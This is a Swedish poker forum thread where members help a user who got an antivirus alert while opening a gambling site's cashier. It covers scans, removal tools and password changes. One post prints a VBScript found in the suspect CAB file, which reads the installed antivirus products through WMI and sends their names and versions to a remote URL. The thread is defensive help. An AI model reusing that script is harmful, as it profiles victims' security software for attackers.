Gå till innehåll

malware detected?


P3zz

Recommended Posts

Satt och lirade och skulle trycka upp "cashiern" på Diamondbet då det i samma stund poppade upp en varning från AVG Internet Security om malware detection. Filen som påstods vara infekterad heter browser.exe och den togs bort på några sekunder efter att den hamnat i karantän.

 

Har inte tidigare på 1,5 år fått någon varning ens om liknande. Använder AVG internet security med senaste updates, surfar inte på datorn och har endast pokerprogram installerade dvs inget msn eller dylikt.

 

Bör jag vara orolig?

 

prinstcreen på "details" från AVG kan ses på http://www.megafileupload.com/en/file/259748/IMG-0415-JPG.html

Länk till kommentar
Dela på andra webbplatser

Lägg upp bild på annan sajt som imageshack. Då jag helst inte vill ladda ner ngn fil :)

 

Det är en malware fil. Så din dator var infekterad men om du nu tog bort den så är det löst.

 

Jag skulle dock råda dig att ladda ner SuperAntiSpyware (Finns som gratis version) Och uppdatera den till senaste version och sen göra en scan.

 

Sen råder jag dig att skaffa ett annat Anitvirus än AVG då AVG inte är en av dom bästa eller ens i närheten av de bästa. Avira , Avast, Nod32 , Kaspersky, Northon är några som är betydligt bättre.

Länk till kommentar
Dela på andra webbplatser

Har inte heller laddat ner filen, finns bättre ställen att hosta bilder på. Tinypic.com 2shared.com imageshack.com ..

 

Iaf så tror jag det är ett false-alert. Browser.exe känns troligen igen som malware eftersom den använda IE funktioner för att ha en inbyggd webbläsare, en funktion som många malware använder sig av. Dock inte säkert att det är hellugnt för det, men väldigt troligt. Jag skulle inte räknat datorn som oinfekterad ifall det är så att vi ska räkna att den vart infekterad nu, så blir den inte ren bara för att du tar bort en infekterad fil (browser.exe). Jag kan nästan garantera att ifall ett "virus" ville ha dina kontouppgifter så skulle det inte infektera denna .exe fil.

 

Själv skulle jag testat att ominstallera pokerprogrammet sen ifall det säger samma så uppdaterat databasen för AV't. Gratisantivirus brukar ta lite längre tid på sig att uppdatera sina databaser än andra. T.ex autohotkey har så vitt jag vet alltid detekteras som ett virus av AVG, när det gäller kommersiella program så är de snabbare att lägga dem på exklusion-list.

 

Det är så gott som osannolikt att AVG ska vara först att detektera ett unikt virus som gömt sig i en pokerklient och som har kommit förbi klientens egna säkerhetsprocedurer samt att inga andra filer skulle tillhöra detta viruset.

Och att det skett precis vid en uppdatering av databasen.. Nej, mest troligt att varningen försvinner om några dagar eller vecka.

 

Sen råder jag dig att skaffa ett annat Anitvirus än AVG då AVG inte är en av dom bästa eller ens i närheten av de bästa. Avira , Avast, Nod32 , Kaspersky, Northon är några som är betydligt bättre.
+1
Länk till kommentar
Dela på andra webbplatser

File Name jobexe-877102-wl-cab

Detections: 9 / 16 (56 %)

 

http://vscan.urlvoid.com/analysis/a659897e438733ff99457614926d0f7e/am9iZXhlLTg3NzEwMi13bC1jYWI=/

 

Gissar att det är ett BHO till IE.

 

Finns "BHO removers" om du söker på google men jag skulle hellre laddat ner autoruns från sysinternals och sökt efter det där, eftersom jag inte har en aning om vilket program som är bra dvs. Sen att det ofta kan bli fel om man är inne i autoruns programmet och pillar på sånt man inte har en aning om vad det är, är ett senare problem.. :ola: Det går iaf att spara inställningarna så det är det första man ska göra. Sen starta i felsäkert läge och åsterställ om du inte kommer in i windows.

 

http://technet.microsoft.com/en-us/sysinternals/default.aspx

 

 

*edit, hittade info om trojanen: Kolla om det är något du känner igen, får väl hålla tummarna för att det inte är något.

http://www.pcthreat.com/parasitebyid-8682en.html

Länk till kommentar
Dela på andra webbplatser

http://vscan.urlvoid.com/analysis/a659897e438733ff99457614926d0f7e/am9iZXhlLTg3NzEwMi13bC1jYWI=/

 

Gissar att det är ett BHO till IE.

 

Finns "BHO removers" om du söker på google men jag skulle hellre laddat ner autoruns från sysinternals och sökt efter det där, eftersom jag inte har en aning om vilket program som är bra dvs. Sen att det ofta kan bli fel om man är inne i autoruns programmet och pillar på sånt man inte har en aning om vad det är, är ett senare problem.. :ola: Det går iaf att spara inställningarna så det är det första man ska göra. Sen starta i felsäkert läge och åsterställ om du inte kommer in i windows.

 

http://technet.microsoft.com/en-us/sysinternals/default.aspx

 

 

*edit, hittade info om trojanen: Kolla om det är något du känner igen, får väl hålla tummarna för att det inte är något.

http://www.pcthreat.com/parasitebyid-8682en.html

 

Ty, installerade malwarebytes' anti-malware och den tog bort filen men jag vet inte om den var ondsint eller inte?

Länk till kommentar
Dela på andra webbplatser

Ty, installerade malwarebytes' anti-malware och den tog bort filen men jag vet inte om den var ondsint eller inte?

 

Svårt att veta.. Du kan ju öppna CAB-filen med förslagsvis winrar, kolla vad som finns där och jämföra med infon från pcthreat-länken.

 

Skulle tro att det finns fler saker som är infekterade än just den, eftersom NOD har varnat för en URL som du inte känner igen, så tyder det på att något händer i bakgrunden.

 

*edit: kollade själv, verkar hyffsat suspekt. Har ingen direkt kunskap om BHO's men kollade programmen som fanns i filen och så har jag svårt att se legitima program köras. En dll fil som har en gömd exe fil, som är inkluderad i en annan exe fil t.ex.. Det kan oxå vara en sketen toolbar som inte gör något särskilt mer än lägger till oönskade funktioner, men vet du inte vad det är så är det onödigt att ha den kvar imo, och sen är det ett fint ställe för trojaner att gömma sig på. Postar länk till en bild som fanns i en av filerna, kallas tydligen "tango toolbar".

 

http://dc174.2shared.com/img/15737863/c95a7819/Data_1.gif

 

Ladda hem dds.scr så ser du vilka BHO's som är installerade bla.

Länk till kommentar
Dela på andra webbplatser

Ändrar mig, det är med 99.9% säkerhet något du inte vill ha att göra med.

Följande script hittade jag i en av filerna som fanns i CAB filen:

Function URLEncode(str)

 

str = Replace(str, "%", "%25")

str = Replace(str, "/", "%2F")

str = Replace(str, "|", "%7C")

str = Replace(str, "?", "%3F")

str = Replace(str, "!", "%21")

str = Replace(str, "@", "%40")

str = Replace(str, "\", "%5C")

str = Replace(str, "#", "%23")

str = Replace(str, "$", "%24")

str = Replace(str, "^", "%5E")

str = Replace(str, "&", "%26")

str = Replace(str, "*", "%2A")

str = Replace(str, "(", "%28")

str = Replace(str, ")", "%29")

str = Replace(str, "}", "%7D")

str = Replace(str, ":", "%3A")

str = Replace(str, ",", "%2C")

str = Replace(str, "{", "%7B")

str = Replace(str, "+", "%2B")

str = Replace(str, ".", "%2E")

str = Replace(str, "-", "%2D")

str = Replace(str, "~", "%7E")

str = Replace(str, "-", "%2D")

str = Replace(str, "[", "%5B")

str = Replace(str, "_", "%5F")

str = Replace(str, "]", "%5D")

str = Replace(str, "`", "%60")

str = Replace(str, "=", "%3D")

str = Replace(str, "'", "%27")

str = Replace(str, " ", "+")

str = Replace(str, Chr(34), "%22")

 

 

URLEncode = str

 

End Function

 

 

Dim urlbase

 

urlbase = WScript.Arguments(0)

 

strComputer = "."

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\SecurityCenter")

 

Set colItems = objWMIService.ExecQuery("Select * from AntiVirusProduct")

 

Dim url

Dim bHasAV

Dim o

 

bHasAV = FALSE

 

For Each objItem in colItems

 

bHasAV = TRUE

 

'Wscript.Echo "Company Name: " & objItem.companyName

'Wscript.Echo "Display Name: " & objItem.displayName

'Wscript.Echo "Version Number: " & objItem.versionNumber

'Wscript.Echo "Instance GUID: " & objItem.instanceGuid

'Wscript.Echo "Product Upto Date: " & objItem.productUptoDate

 

url = urlbase & "companyName=" & URLEncode(objItem.companyName) & "&displayName=" & URLEncode(objItem.displayName) & "&versionNumber=" & URLEncode(objItem.versionNumber)

 

'Wscript.Echo "Url: " & url

 

Set o = CreateObject("MSXML2.XMLHTTP")

o.open "GET", url, False

o.send

 

Next

 

 

IF NOT bHasAV THEN

 

url = urlbase & "companyName=None&displayName=None&&versionNumber=None"

 

'Wscript.Echo "Url: " & url

 

Set o = CreateObject("MSXML2.XMLHTTP")

o.open "GET", url, False

o.send

 

END IF

 

 

 

Länk till kommentar
Dela på andra webbplatser

Otroligt tacksam för all hjälp. Förstår inget av det där men tror filen är borta. Byta alla lösenord?
Ja, det skadar väl knappast. Man ska helst byta ett par ggr/år minst sägs det..

 

Kanske inte det bästa att göra ifrån en misstänkt infekterad dator iofs, onödigt att skriva in lösenord på nytt då.

 

Scriptet som jag postade försöker troligen installera ett sk. fejk-antivirus och de är extremt jobbiga att få bort. De i sin tur installerar ofta all möjligt skit också..

 

Mycket möjligt iaf att du inte har hunnit bli infekterad. Missade att BHO'n vart installerad redan men NOD32 blockerade den för att köras, så det är ju bra.

Lite skumt att det inte gavs något alternativ för att radera den. Du har troligen fått in den när du surfat.

 

Rekommenderar att byta webbläsare. Varför använder du internet explorer? Själv använder jag oftast Opera, dels eftersom det är så få andra som gör det = bättre för mig. :) Kör jag IE så virtualiserar jag, värre virusklister finns inte.

Länk till kommentar
Dela på andra webbplatser

Tanka detta program Snygglen och kör det minst en gång i veckan.

 

SuperAntiSpyware

 

Mkt effektivit program. För att ta bort sånt skit. :)

 

Tipsade i min dagbok om Maxthon 3.0 men gör det här med. Sjukt bra browser och den bästa av dom alla i tester. Snabbare browser än Maxthon finns inte. Den har allt det man vill ha oxå. Kan bara reka.

Länk till kommentar
Dela på andra webbplatser

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Gäst
Svara i detta ämne...

×   Du har klistrat in innehåll med formatering.   Ta bort formatering

  Endast 75 max uttryckssymboler är tillåtna.

×   Din länk har automatiskt bäddats in.   Visa som länk istället

×   Ditt tidigare innehåll har återställts.   Rensa redigerare

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Skapa nytt...